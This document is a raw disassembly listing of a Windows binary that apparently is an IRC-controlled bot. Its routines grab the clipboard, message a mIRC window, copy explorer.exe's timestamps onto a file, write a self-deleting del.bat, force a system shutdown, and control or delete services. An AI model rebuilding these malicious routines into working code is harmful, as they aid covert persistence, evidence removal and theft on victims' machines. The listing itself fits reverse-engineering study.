push [ebp+arg_0]
call sub_4158E0
push [ebp+arg_4]
mov [ebp+var_4], eax
call sub_4158E0
mov esi, eax
lea eax, [ebp+var_100C]
push eax
push esi
push [ebp+arg_4]
mov [ebp+var_C], esi
call sub_40122B
add esp, 14h
dec esi
mov edi, esi
loc_40FB7D: ; CODE XREF: sub_40FB3F+B6�j
test esi, esi
jle short loc_40FBFB
mov eax, [ebp+arg_4]
movsx eax, byte ptr [esi+eax]
push eax
call sub_417C24
mov ebx, eax
mov eax, [ebp+arg_0]
movsx eax, byte ptr [edi+eax]
push eax
call sub_417C24
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40FBF3
loc_40FBA3: ; CODE XREF: sub_40FB3F+B2�j
mov ebx, [ebp+arg_0]
mov al, [edi+ebx]
push eax
call sub_401131
mov edx, [ebp+var_C]
mov eax, [ebp+eax*4+var_100C]
pop ecx
mov ecx, edx
sub ecx, esi
cmp ecx, eax
jle short loc_40FBC4
mov eax, ecx
loc_40FBC4: ; CODE XREF: sub_40FB3F+81�j
add edi, eax
cmp edi, [ebp+var_4]
jge short loc_40FBF7
mov eax, [ebp+arg_4]
lea esi, [edx-1]
movsx eax, byte ptr [esi+eax]
push eax
call sub_417C24
mov edx, eax
movsx eax, byte ptr [edi+ebx]
push eax
mov [ebp+var_8], edx
call sub_417C24
pop ecx
pop ecx
mov ecx, [ebp+var_8]
cmp eax, ecx
jnz short loc_40FBA3
loc_40FBF3: ; CODE XREF: sub_40FB3F+62�j
dec edi
dec esi
jmp short loc_40FB7D
; ---------------------------------------------------------------------------
loc_40FBF7: ; CODE XREF: sub_40FB3F+8A�j
xor eax, eax
jmp short loc_40FC00
; ---------------------------------------------------------------------------
loc_40FBFB: ; CODE XREF: sub_40FB3F+40�j
mov eax, [ebp+arg_0]
add eax, edi
loc_40FC00: ; CODE XREF: sub_40FB3F+BA�j
pop edi
pop esi
pop ebx
leave
retn
sub_40FB3F endp
; ---------------------------------------------------------------------------
db 31h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FC36 proc near ; CODE XREF: sub_4010F5�j
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push esi
call ds:dword_495328 ; RtlGetLastWin32Error
mov esi, eax
push 0
lea eax, [ebp+var_100]
push 100h
push eax
push 400h
push esi
push 0
push 1200h
call ds:dword_4953C8 ; FormatMessageA
lea eax, [ebp+var_100]
loc_40FC6F: ; CODE XREF: sub_40FC36+46�j
mov cl, [eax]
cmp cl, 1Fh
jg short loc_40FC7B
cmp cl, 9
jnz short loc_40FC7E
loc_40FC7B: ; CODE XREF: sub_40FC36+3E�j
inc eax
jmp short loc_40FC6F
; ---------------------------------------------------------------------------
loc_40FC7E: ; CODE XREF: sub_40FC36+43�j
; sub_40FC36+5B�j ...
and byte ptr [eax], 0
dec eax
lea ecx, [ebp+var_100]
cmp eax, ecx
jb short loc_40FC98
mov cl, [eax]
cmp cl, 2Eh
jz short loc_40FC7E
cmp cl, 21h
jl short loc_40FC7E
loc_40FC98: ; CODE XREF: sub_40FC36+54�j
lea eax, [ebp+var_100]
push esi
push eax
mov esi, offset dword_491808
push [ebp+arg_0]
push offset aSErrorSD_ ; "%s Error: %s <%d>."
push 200h
push esi
call sub_4163D7
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_40FC36 endp
; ---------------------------------------------------------------------------
db 22h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_40FCE2 proc near ; CODE XREF: sub_4012C1�j
push esi
push 0
call dword_49162C ; OpenClipboard
test eax, eax
jz short loc_40FD19
push 1
call dword_49164C ; GetClipboardData
mov esi, eax
test esi, esi
jz short loc_40FD19
push edi
push esi
call ds:dword_4953D0 ; GlobalLock
push esi
mov edi, eax
call ds:dword_4953CC ; GlobalUnlock
call dword_4916B0 ; CloseClipboard
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_40FD19: ; CODE XREF: sub_40FCE2+B�j
; sub_40FCE2+19�j
xor eax, eax
pop esi
retn
sub_40FCE2 endp
; ---------------------------------------------------------------------------
db 0Eh dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_40FD2B proc near ; CODE XREF: sub_4011F4�j
arg_0 = dword ptr 4
push ebp
push esi
push edi
xor esi, esi
mov edi, offset aMirc_0 ; "mIRC"
push esi
push edi
call dword_491668 ; FindWindowA
mov ebp, eax
cmp ebp, esi
jz short loc_40FDA7
push ebx
push edi
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call ds:dword_4953D8 ; CreateFileMappingA
push esi
push esi
mov edi, eax
push esi
push 0F001Fh
push edi
call ds:dword_4952E0 ; MapViewOfFile
push [esp+10h+arg_0]
mov ebx, eax
push ebx
call sub_416821
pop ecx
pop ecx
push esi
push 1
push 4C8h
push ebp
call dword_4916B8 ; SendMessageA
push esi
push 1
push 4C9h
push ebp
call dword_4916B8 ; SendMessageA
push ebx
call ds:dword_4953D4 ; UnmapViewOfFile
push edi
call ds:dword_495358 ; CloseHandle
push 1
pop eax
pop ebx
jmp short loc_40FDA9
; ---------------------------------------------------------------------------
loc_40FDA7: ; CODE XREF: sub_40FD2B+16�j
xor eax, eax
loc_40FDA9: ; CODE XREF: sub_40FD2B+7A�j
pop edi
pop esi
pop ebp
retn
sub_40FD2B endp
; ---------------------------------------------------------------------------
db 20h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FDCD proc near ; CODE XREF: sub_401320�j
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push ebx
push esi
xor esi, esi
push edi
lea eax, [ebp+var_11C]
push esi
push eax
push 104h
push esi
push offset aExplorer_exe ; "explorer.exe"
push esi
call dword_491718 ; SearchPathA
test eax, eax
jz short loc_40FE6C
mov edi, 80h
push esi
push edi
push 3
push esi
mov esi, ds:dword_495360
push 1
lea eax, [ebp+var_11C]
push 80000000h
push eax
call esi ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_40FE6C
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
call ds:dword_4953E0 ; GetFileTime
push ebx
mov ebx, ds:dword_495358
call ebx ; CloseHandle
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40FE6C
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_4953DC ; SetFileTime
push esi
call ebx ; CloseHandle
loc_40FE6C: ; CODE XREF: sub_40FDCD+2A�j
; sub_40FDCD+51�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40FDCD endp
; ---------------------------------------------------------------------------
db 29h dup(0CCh)
; ---------------------------------------------------------------------------
loc_40FE9A: ; CODE XREF: .text:00401091�j
push ebp
mov ebp, esp
sub esp, 454h
push esi
xor esi, esi
push 10h
lea eax, [ebp-10h]
push esi
push eax
call sub_415CA0
push 44h
lea eax, [ebp-54h]
push esi
push eax
call sub_415CA0
push dword ptr [ebp+0Ch]
lea eax, [ebp-454h]
mov dword ptr [ebp-54h], 44h
mov dword ptr [ebp-28h], 1
push dword ptr [ebp+8]
mov [ebp-24h], si
push offset aSS ; "%s %s"
push 400h
push eax
call sub_4163D7
add esp, 2Ch
lea eax, [ebp-10h]
push eax
lea eax, [ebp-54h]
push eax
push esi
push esi
push 28h
push esi
push esi
lea eax, [ebp-454h]
push esi
push eax
push dword ptr [ebp+8]
call ds:dword_495354 ; CreateProcessA
neg eax
sbb eax, eax
pop esi
and eax, [ebp-8]
leave
retn
; ---------------------------------------------------------------------------
db 1Fh dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_40FF37 proc near ; CODE XREF: sub_401136�j
push 1
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
call sub_401262
pop ecx
pop ecx
push 50005h
push 6
call dword_4915A4 ; ExitWindowsEx
neg eax
sbb eax, eax
neg eax
retn
sub_40FF37 endp
; ---------------------------------------------------------------------------
db 8 dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FF61 proc near ; CODE XREF: sub_401122�j
var_764 = byte ptr -764h
var_364 = byte ptr -364h
var_260 = byte ptr -260h
var_15C = byte ptr -15Ch
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_14 = byte ptr -14h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 764h
push esi
xor esi, esi
cmp dword_42C938, esi
push edi
jz short loc_40FF85
cmp dword_49172C, esi
jnz short loc_40FF85
push esi
call sub_4012FD
pop ecx
loc_40FF85: ; CODE XREF: sub_40FF61+13�j
; sub_40FF61+1B�j
call sub_401109
lea eax, [ebp+var_764]
push eax
push 400h
call ds:dword_4953B8 ; GetTempPathA
lea eax, [ebp+var_764]
push eax
lea eax, [ebp+var_260]
push offset aSdel_bat ; "%sdel.bat"
push eax
call sub_416821
add esp, 0Ch
lea eax, [ebp+var_260]
push esi
push esi
push 2
push esi
push esi
push 40000000h
push eax
call ds:dword_495360 ; CreateFileA
mov edi, eax
cmp edi, esi
jbe loc_4100E5
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
push eax
call sub_416821
add esp, 0Ch
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_764]
push eax
call sub_4158E0
pop ecx
push eax
lea eax, [ebp+var_764]
push eax
push edi
call ds:dword_49535C ; WriteFile
push edi
call ds:dword_495358 ; CloseHandle
push 10h
lea eax, [ebp+var_14]
push esi
push eax
call sub_415CA0
push 44h
lea eax, [ebp+var_58]
pop edi
push edi
push esi
push eax
call sub_415CA0
add esp, 18h
mov [ebp+var_58], edi
mov edi, 104h
lea eax, [ebp+var_15C]
push edi
push eax
push esi
mov [ebp+var_4C], offset byte_4370BC
mov [ebp+var_2C], 1
mov [ebp+var_28], si
call ds:dword_4953A8 ; GetModuleHandleA
push eax
call ds:dword_495330 ; GetModuleFileNameA
lea eax, [ebp+var_15C]
push eax
call ds:dword_495374 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_41008D
lea eax, [ebp+var_15C]
push 80h
push eax
call ds:dword_4953A4 ; SetFileAttributesA
loc_41008D: ; CODE XREF: sub_40FF61+118�j
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset aComspecCSS ; "%%comspec%% /c %s %s"
push eax
call sub_416821
add esp, 10h
lea eax, [ebp+var_364]
push edi
push eax
lea eax, [ebp+var_764]
push eax
call ds:dword_4953E4 ; ExpandEnvironmentStringsA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push 4008h
push 1
push esi
lea eax, [ebp+var_364]
push esi
push eax
push esi
call ds:dword_495354 ; CreateProcessA
loc_4100E5: ; CODE XREF: sub_40FF61+72�j
pop edi
pop esi
leave
retn
sub_40FF61 endp
; ---------------------------------------------------------------------------
db 62h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_41014B proc near ; CODE XREF: sub_4010C3�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
test edi, edi
jz short loc_4101B0
lea esi, [eax+eax*2]
push 0
shl esi, 2
push 0
push dword_430650[esi]
push edi
push eax
call sub_401154
add esp, 14h
test eax, eax
jnz short loc_410193
push edi
push off_43064C[esi]
mov esi, offset dword_492134
push offset unk_4307A0
push esi
call sub_416821
add esp, 10h
jmp short loc_4101CD
; ---------------------------------------------------------------------------
loc_410193: ; CODE XREF: sub_41014B+2A�j
push eax
call sub_4102BD
push eax
push edi
mov esi, offset dword_492134
push offset unk_430764
push esi
call sub_416821
add esp, 14h
jmp short loc_4101CD
; ---------------------------------------------------------------------------
loc_4101B0: ; CODE XREF: sub_41014B+C�j
lea eax, [eax+eax*2]
mov esi, offset dword_492134
push off_430648[eax*4]
push offset unk_43072C
push esi
call sub_416821
add esp, 0Ch
loc_4101CD: ; CODE XREF: sub_41014B+46�j
; sub_41014B+63�j
mov eax, esi
pop edi
pop esi
retn
sub_41014B endp
; ---------------------------------------------------------------------------
db 21h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4101F3 proc near ; CODE XREF: sub_401154�j
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
call dword_491650 ; OpenSCManagerA
mov edi, eax
cmp edi, ebx
jnz short loc_41021A
call ds:dword_495328 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_41028F
; ---------------------------------------------------------------------------
loc_41021A: ; CODE XREF: sub_4101F3+1B�j
push esi
push 0F01FFh
push [ebp+arg_4]
push edi
call dword_491544 ; OpenServiceA
mov esi, eax
cmp esi, ebx
jnz short loc_41023A
call ds:dword_495328 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_410287
; ---------------------------------------------------------------------------
loc_41023A: ; CODE XREF: sub_4101F3+3B�j
mov eax, [ebp+arg_0]
cmp eax, 1
jz short loc_41026D
cmp eax, 3
jz short loc_41025E
jle short loc_410280
cmp eax, 6
jg short loc_410280
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push esi
call dword_4915AC ; ControlService
jmp short loc_410274
; ---------------------------------------------------------------------------
loc_41025E: ; CODE XREF: sub_4101F3+52�j
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call dword_49154C ; StartServiceA
jmp short loc_410274
; ---------------------------------------------------------------------------
loc_41026D: ; CODE XREF: sub_4101F3+4D�j
push esi
call dword_4915B0 ; DeleteService
loc_410274: ; CODE XREF: sub_4101F3+69�j
; sub_4101F3+78�j
test eax, eax
jnz short loc_410280
call ds:dword_495328 ; RtlGetLastWin32Error
mov ebx, eax
loc_410280: ; CODE XREF: sub_4101F3+54�j
; sub_4101F3+59�j ...
push esi
call dword_491560 ; CloseServiceHandle
loc_410287: ; CODE XREF: sub_4101F3+45�j
push edi
call dword_491560 ; CloseServiceHandle
pop esi
loc_41028F: ; CODE XREF: sub_4101F3+25�j
mov eax, ebx
pop edi
pop ebx
leave
retn
sub_4101F3 endp
; ---------------------------------------------------------------------------
db 28h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_4102BD proc near ; CODE XREF: sub_41014B+49�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 420h
cmp eax, ecx
ja loc_410372
jz loc_41036B
add ecx, 0FFFFFFFBh
cmp eax, ecx
ja short loc_410335
jz short loc_41032B
mov ecx, eax
sub ecx, 3
jz short loc_410321
dec ecx
dec ecx
jz short loc_410317
dec ecx
jz short loc_41030D
sub ecx, 51h
jz short loc_410303
sub ecx, 24h
jnz loc_4103E8 ; default
; jumptable 0041038F cases 1,5,6,8,9,12,13,15,16
push offset aTheSpecifiedSe ; "The specified service name is invalid."
jmp loc_4103DA
; ---------------------------------------------------------------------------
loc_410303: ; CODE XREF: sub_4102BD+31�j
push offset aTheRequestedCo ; "The requested control code is undefined"...
jmp loc_4103DA
; ---------------------------------------------------------------------------
loc_41030D: ; CODE XREF: sub_4102BD+2C�j
push offset aTheHandleIsInv ; "The handle is invalid."
jmp loc_4103DA
; ---------------------------------------------------------------------------
loc_410317: ; CODE XREF: sub_4102BD+29�j
push offset aTheHandleDoesN ; "The handle does not have the required a"...
jmp loc_4103DA
; ---------------------------------------------------------------------------
loc_410321: ; CODE XREF: sub_4102BD+25�j
push offset aTheServiceBina ; "The service binary file could not be fo"...
jmp loc_4103DA
; ---------------------------------------------------------------------------
loc_41032B: ; CODE XREF: sub_4102BD+1E�j
push offset aTheServiceCann ; "The service cannot be stopped because o"...
jmp loc_4103DA
; ---------------------------------------------------------------------------
loc_410335: ; CODE XREF: sub_4102BD+1C�j
mov ecx, eax
sub ecx, 41Ch
jz short loc_410364
dec ecx
jz short loc_41035D
dec ecx
jz short loc_410356
dec ecx
jnz loc_4103E8 ; default
; jumptable 0041038F cases 1,5,6,8,9,12,13,15,16
push offset aTheDatabaseIsL ; "The database is locked."
jmp loc_4103DA
; ---------------------------------------------------------------------------
loc_410356: ; CODE XREF: sub_4102BD+86�j
push offset aAThreadCouldNo ; "A thread could not be created for the s"...
jmp short loc_4103DA
; ---------------------------------------------------------------------------
loc_41035D: ; CODE XREF: sub_4102BD+83�j
push offset aTheProcessForT ; "The process for the service was started"...
jmp short loc_4103DA
; ---------------------------------------------------------------------------
loc_410364: ; CODE XREF: sub_4102BD+80�j
push offset aTheRequested_0 ; "The requested control code is not valid"...
jmp short loc_4103DA
; ---------------------------------------------------------------------------
loc_41036B: ; CODE XREF: sub_4102BD+11�j
push offset aAnInstanceOfTh ; "An instance of the service is already r"...
jmp short loc_4103DA
; ---------------------------------------------------------------------------
loc_410372: ; CODE XREF: sub_4102BD+B�j
mov ecx, 45Bh
cmp eax, ecx
ja short loc_4103E8 ; default
; jumptable 0041038F cases 1,5,6,8,9,12,13,15,16
jz short loc_4103D5
lea ecx, [eax-422h]
cmp ecx, 11h ; switch 18 cases
ja short loc_4103E8 ; default
; jumptable 0041038F cases 1,5,6,8,9,12,13,15,16
movzx ecx, ds:byte_410429[ecx]
jmp ds:off_410401[ecx*4] ; switch jump
loc_410396: ; DATA XREF: .text:off_410401�o
push offset aTheSpecifiedDa ; jumptable 0041038F case 7
jmp short loc_4103DA
; ---------------------------------------------------------------------------
loc_41039D: ; CODE XREF: sub_4102BD+D2�j
; DATA XREF: .text:off_410401�o
push offset aTheServiceDepe ; jumptable 0041038F case 17
jmp short loc_4103DA
; ---------------------------------------------------------------------------
loc_4103A4: ; CODE XREF: sub_4102BD+D2�j
; DATA XREF: .text:off_410401�o
push offset aTheServiceDe_0 ; jumptable 0041038F case 10
jmp short loc_4103DA
; ---------------------------------------------------------------------------
loc_4103AB: ; CODE XREF: sub_4102BD+D2�j
; DATA XREF: .text:off_410401�o
push offset aTheServiceHasB ; jumptable 0041038F case 0
jmp short loc_4103DA
; ---------------------------------------------------------------------------
loc_4103B2: ; CODE XREF: sub_4102BD+D2�j
; DATA XREF: .text:off_410401�o
push offset aTheSpecified_0 ; jumptable 0041038F case 2
jmp short loc_4103DA
; ---------------------------------------------------------------------------
loc_4103B9: ; CODE XREF: sub_4102BD+D2�j
; DATA XREF: .text:off_410401�o
push offset aTheServiceCoul ; jumptable 0041038F case 11
jmp short loc_4103DA
; ---------------------------------------------------------------------------
loc_4103C0: ; CODE XREF: sub_4102BD+D2�j
; DATA XREF: .text:off_410401�o
push offset aTheServiceHa_0 ; jumptable 0041038F case 14
jmp short loc_4103DA
; ---------------------------------------------------------------------------
loc_4103C7: ; CODE XREF: sub_4102BD+D2�j
; DATA XREF: .text:off_410401�o
push offset aTheRequested_1 ; jumptable 0041038F case 3
jmp short loc_4103DA
; ---------------------------------------------------------------------------
loc_4103CE: ; CODE XREF: sub_4102BD+D2�j
; DATA XREF: .text:off_410401�o
push offset aTheServiceHasN ; jumptable 0041038F case 4
jmp short loc_4103DA
; ---------------------------------------------------------------------------
loc_4103D5: ; CODE XREF: sub_4102BD+BE�j
push offset aTheSystemIsShu ; "The system is shutting down."
loc_4103DA: ; CODE XREF: sub_4102BD+41�j
; sub_4102BD+4B�j ...
push offset dword_491A74
call sub_416821
pop ecx
pop ecx
jmp short loc_4103FB
; ---------------------------------------------------------------------------
loc_4103E8: ; CODE XREF: sub_4102BD+36�j
; sub_4102BD+89�j ...
push eax ; default
; jumptable 0041038F cases 1,5,6,8,9,12,13,15,16
push offset aAnUnknownError ; "An unknown error occurred: <%ld>"
push offset dword_491A74
call sub_416821
add esp, 0Ch
loc_4103FB: ; CODE XREF: sub_4102BD+129�j
mov eax, offset dword_491A74
retn
sub_4102BD endp
; ---------------------------------------------------------------------------
off_410401 dd offset loc_4103AB ; DATA XREF: sub_4102BD+D2�r
dd offset loc_4103B2 ; jump table for switch statement
dd offset loc_4103C7
dd offset loc_4103CE
dd offset loc_410396
dd offset loc_4103A4
dd offset loc_4103B9
dd offset loc_4103C0
dd offset loc_41039D
dd offset loc_4103E8
byte_410429 db 0, 9, 1, 2 ; DATA XREF: sub_4102BD+CB�r
db 3, 9, 9, 4 ; indirect table for switch statement
db 9, 9, 5, 6
db 9, 9, 7, 9
db 9, 8
db 5Fh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41049A proc near ; CODE XREF: sub_4010E1�j
var_38C = byte ptr -38Ch
var_18C = byte ptr -18Ch
var_188 = byte ptr -188h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_8], ebx
call dword_491650 ; OpenSCManagerA
push ebx
mov [ebp+var_C], eax
push [ebp+arg_8]
push offset aTheFollowingWi ; "The following Windows services are regi"...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
add esp, 14h
loc_4104D2: ; CODE XREF: sub_41049A+120�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18C]
push 168h
push eax
push 3
push 30h
push [ebp+var_C]
call dword_49161C ; EnumServicesStatusA
test eax, eax
jnz short loc_41050C
call ds:dword_495328 ; RtlGetLastWin32Error
cmp eax, 0EAh
jnz loc_4105C0
loc_41050C: ; CODE XREF: sub_41049A+5F�j
xor edi, edi
cmp [ebp+var_4], ebx
jle loc_4105B7
lea esi, [ebp+var_188]
loc_41051D: ; CODE XREF: sub_41049A+117�j
mov eax, [esi+8]
dec eax
jz short loc_410566
dec eax
jz short loc_41055F
dec eax
jz short loc_410558
dec eax
jz short loc_410551
dec eax
jz short loc_41054A
dec eax
jz short loc_410543
dec eax
jz short loc_41053C
push offset aUnknown_0 ; " Unknown"
jmp short loc_41056B
; ---------------------------------------------------------------------------
loc_41053C: ; CODE XREF: sub_41049A+99�j
push offset aPaused ; " Paused"
jmp short loc_41056B
; ---------------------------------------------------------------------------
loc_410543: ; CODE XREF: sub_41049A+96�j
push offset aPausing ; " Pausing"
jmp short loc_41056B
; ---------------------------------------------------------------------------
loc_41054A: ; CODE XREF: sub_41049A+93�j
push offset aContinuing ; " Continuing"
jmp short loc_41056B
; ---------------------------------------------------------------------------
loc_410551: ; CODE XREF: sub_41049A+90�j
push offset aRunning ; " Running"
jmp short loc_41056B
; ---------------------------------------------------------------------------
loc_410558: ; CODE XREF: sub_41049A+8D�j
push offset aStoping ; " Stoping"
jmp short loc_41056B
; ---------------------------------------------------------------------------
loc_41055F: ; CODE XREF: sub_41049A+8A�j
push offset aStarting ; " Starting"
jmp short loc_41056B
; ---------------------------------------------------------------------------
loc_410566: ; CODE XREF: sub_41049A+87�j
push offset aStopped ; " Stopped"
loc_41056B: ; CODE XREF: sub_41049A+A0�j
; sub_41049A+A7�j ...
lea eax, [ebp+var_20]
push eax
call sub_416821
pop ecx
lea eax, [ebp+var_20]
pop ecx
push dword ptr [esi]
push dword ptr [esi-4]
push eax
lea eax, [ebp+var_38C]
push offset aSSS_2 ; "%s: %s (%s)"
push eax
call sub_416821
push 1
lea eax, [ebp+var_38C]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
add esp, 28h
inc edi
add esi, 24h
cmp edi, [ebp+var_4]
jl loc_41051D
loc_4105B7: ; CODE XREF: sub_41049A+77�j
cmp [ebp+var_8], ebx
jnz loc_4104D2
loc_4105C0: ; CODE XREF: sub_41049A+6C�j
push [ebp+var_C]
call dword_491560 ; CloseServiceHandle
xor eax, eax
pop edi
cmp eax, [ebp+var_4]
pop esi
pop ebx
sbb eax, eax
neg eax
leave
retn
sub_41049A endp
; ---------------------------------------------------------------------------
db 4Fh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410626 proc near ; CODE XREF: sub_40117C�j
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
test edi, edi
jz loc_4106BF
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, 0
jz short loc_41064F
dec eax
jnz short loc_41069F
push edi
push 0
call sub_40107D
pop ecx
pop ecx
jmp short loc_41069B
; ---------------------------------------------------------------------------
loc_41064F: ; CODE XREF: sub_410626+18�j
cmp [ebp+arg_8], 0
jnz short loc_41068D
push 24h
push edi
call sub_417B60
pop ecx
test eax, eax
pop ecx
jnz short loc_41068D
push 57h
pop eax
loc_410666: ; CODE XREF: sub_410626+77�j
push eax
call sub_411235
push eax
lea eax, [esi+esi*2]
push edi
mov esi, offset dword_491D30
push off_430648[eax*4]
push offset unk_430E70
push esi
call sub_416821
add esp, 18h
jmp short loc_4106DF
; ---------------------------------------------------------------------------
loc_41068D: ; CODE XREF: sub_410626+2D�j
; sub_410626+3B�j
push [ebp+arg_8]
push edi
push 0
call sub_40132F
add esp, 0Ch
loc_41069B: ; CODE XREF: sub_410626+27�j
test eax, eax
jnz short loc_410666
loc_41069F: ; CODE XREF: sub_410626+1B�j
lea eax, [esi+esi*2]
push edi
mov esi, offset dword_491D30
push off_43064C[eax*4]
push offset unk_430E44
push esi
call sub_416821
add esp, 10h
jmp short loc_4106DF
; ---------------------------------------------------------------------------
loc_4106BF: ; CODE XREF: sub_410626+A�j
mov eax, [ebp+arg_0]
mov esi, offset dword_491D30
lea eax, [eax+eax*2]
push off_430648[eax*4]
push offset unk_430E0C
push esi
call sub_416821
add esp, 0Ch
loc_4106DF: ; CODE XREF: sub_410626+65�j
; sub_410626+97�j
mov eax, esi
pop edi
pop esi
pop ebp
retn
sub_410626 endp
; ---------------------------------------------------------------------------
db 2Fh dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_410714 proc near ; CODE XREF: sub_40114F�j
arg_0 = dword ptr 4
arg_C = dword ptr 10h
push esi
xor esi, esi
cmp [esp+4+arg_0], esi
jnz short loc_410721
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_410721: ; CODE XREF: sub_410714+7�j
push ebx
push ebp
push edi
push esi
push esi
push esi
mov edi, ds:dword_4953E8
push esi
push 0FFFFFFFFh
mov ebx, 400h
push [esp+24h+arg_0]
push ebx
push esi
call edi ; WideCharToMultiByte
test byte_491F30, 1
mov ebp, eax
jnz short loc_41075E
or byte_491F30, 1
lea eax, [ebp+1]
push eax
call sub_416765
pop ecx
mov dword_491CD0, eax
loc_41075E: ; CODE XREF: sub_410714+32�j
push esi
push esi
push ebp
push dword_491CD0
push 0FFFFFFFFh
push [esp+18h+arg_C]
push ebx
push esi
call edi ; WideCharToMultiByte
mov eax, dword_491CD0
pop edi
pop ebp
pop ebx
pop esi
retn
sub_410714 endp
; ---------------------------------------------------------------------------
db 19h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410794 proc near ; CODE XREF: sub_40132F�j
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push edi
push [ebp+arg_0]
call sub_410819
push [ebp+arg_4]
mov edi, eax
call sub_410819
push 24h
mov [ebp+var_20], eax
push [ebp+arg_4]
call sub_417B60
push [ebp+arg_8]
mov [ebp+var_14], 7Fh
neg eax
sbb eax, eax
and [ebp+var_18], 0
or [ebp+var_10], 0FFFFFFFFh
and [ebp+var_C], 0
and eax, 80000000h
mov [ebp+var_1C], eax
call sub_410819
add esp, 14h
mov [ebp+var_8], eax
and [ebp+var_4], 0
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_20]
push eax
push 2
push edi
call dword_49155C
pop edi
leave
retn
sub_410794 endp
; ---------------------------------------------------------------------------
db 1Ah dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_410819 proc near ; CODE XREF: sub_410794+A�p
; sub_410794+14�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
xor eax, eax
cmp ebp, eax
jnz short loc_410826
pop ebp
retn
; ---------------------------------------------------------------------------
loc_410826: ; CODE XREF: sub_410819+9�j
push ebx
push esi
mov esi, ds:dword_4953EC
push edi
push eax
push eax
push 0FFFFFFFFh
push ebp
push 1
push eax
call esi ; MultiByteToWideChar
mov edi, eax
lea eax, [edi+edi+2]
push eax
call sub_416765
pop ecx
mov ebx, eax
push edi
push ebx
push 0FFFFFFFFh
push ebp
push 1
push 0
call esi ; MultiByteToWideChar
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn
sub_410819 endp
; ---------------------------------------------------------------------------
db 10h dup(0CCh)
